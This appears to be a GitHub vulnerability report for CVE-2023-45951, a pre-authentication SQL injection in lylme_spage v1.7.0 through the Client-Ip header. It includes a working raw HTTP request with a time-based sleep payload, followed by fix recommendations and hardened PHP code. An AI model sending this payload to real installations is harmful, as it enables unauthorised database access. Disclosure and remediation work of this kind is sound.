CVE-2023-45951: [vulnerability] Pre-auth SQL Injection Vulnerability in function.php · Issue #32 · LyLme/lylme_spage
lylme_spage v1.7.0 was discovered to contain a SQL injection vulnerability via the $userip parameter at function.php.
Pre-auth SQL Injection Vulnerability in function.php
1. Steps to reproduce
1. Send a POST request to http://host/apply/index.php?submit=post carrying the data below. The injection point is the Client-Ip field in the HTTP header.
```http
POST /apply/index.php?submit=post HTTP/1.1
Host: host
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cookie: PHPSESSID=;XDEBUG_SESSION=PHPSTORM
Client-Ip: 0’>if(1,sleep(10),2)>’
Content-Length: 70

url=http%3A%2F%2Fqq.comcAMMVjjb1OL&name=test&group_id=1&icon=&authcode=
```
Payload: Client-Ip: 0’>if(1,sleep(10),2)>’
2. As shown above, the payload delays the response by more than 10 seconds.
2. Expected behaviour
The get_real_ip function is meant to return a valid, real client IP address.
The returned $userip then becomes part of the value of the $sql variable, which is executed by $DB->query($sql).
3. Actual behaviour
However, in the vulnerable function get_real_ip, $real_ip can be set to an unrestricted malicious SQL payload through the Client-Ip: header field.
So the attack payload Client-Ip: 0’>if(1,sleep(10),2)>’ takes effect and is executed.
4. Affected version
This SQL injection vulnerability affects the latest version: lylme_spage v1.7.0 (六零导航页 v1.7.0).
5. Fix recommendations
To fix this vulnerability, my recommendations are:
1. In get_real_ip, check that the IP is well-formed according to the IPv4 RFC.
2. Sanitize the returned IP, for example strip_tags(daddslashes(get_real_ip()));
3. Delete this variable, which seems unused.
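As an added illustration of recommendation 1 (example code written for this page, not lylme_spage's own get_real_ip or database layer): a get_real_ip() that only accepts header values which parse as an IP address and otherwise falls back to the socket address, followed by the insert done with a bound parameter so the value never reaches the SQL string. The header names consulted, the PDO connection, and the table and column names are assumptions.

```php
<?php
// Hardened replacement for a get_real_ip() that trusts proxy headers.
// Client-Ip arrives in PHP as $_SERVER['HTTP_CLIENT_IP']; any header is
// attacker-controlled, so a value is used only if it parses as an IP.
function get_real_ip(): string
{
    // Assumption: these are the headers the application consults.
    $candidates = [
        $_SERVER['HTTP_CLIENT_IP'] ?? null,        // the injection point
        $_SERVER['HTTP_X_FORWARDED_FOR'] ?? null,  // may be "ip1, ip2, ..."
    ];
    foreach ($candidates as $value) {
        if ($value === null) {
            continue;
        }
        // Take the first entry of a comma-separated list and trim it.
        $ip = trim(explode(',', $value)[0]);
        // filter_var rejects anything that is not a syntactically valid
        // IPv4/IPv6 address, so a payload such as 0’>if(1,sleep(10),2)>’
        // is discarded here instead of reaching the database.
        if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
            return $ip;
        }
    }
    // Fall back to the TCP peer address, which cannot be set via a header.
    return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
}

// Validation alone is defence in depth; the real fix is to stop building
// $sql by concatenation. $pdo, the table and the column names are
// placeholders for the application's own schema.
function insert_apply(PDO $pdo, string $name, string $url, int $groupId): bool
{
    $userip = get_real_ip();
    $stmt = $pdo->prepare(
        'INSERT INTO apply_table (name, url, group_id, ip) VALUES (?, ?, ?, ?)'
    );
    // Bound parameters are sent separately from the statement text, so the
    // value is never interpreted as SQL regardless of its content.
    return $stmt->execute([$name, $url, $groupId, $userip]);
}
```

Note that a syntactically valid Client-Ip value is still spoofable; if the application needs a trustworthy address it should only honour these headers when the request comes from a known reverse proxy.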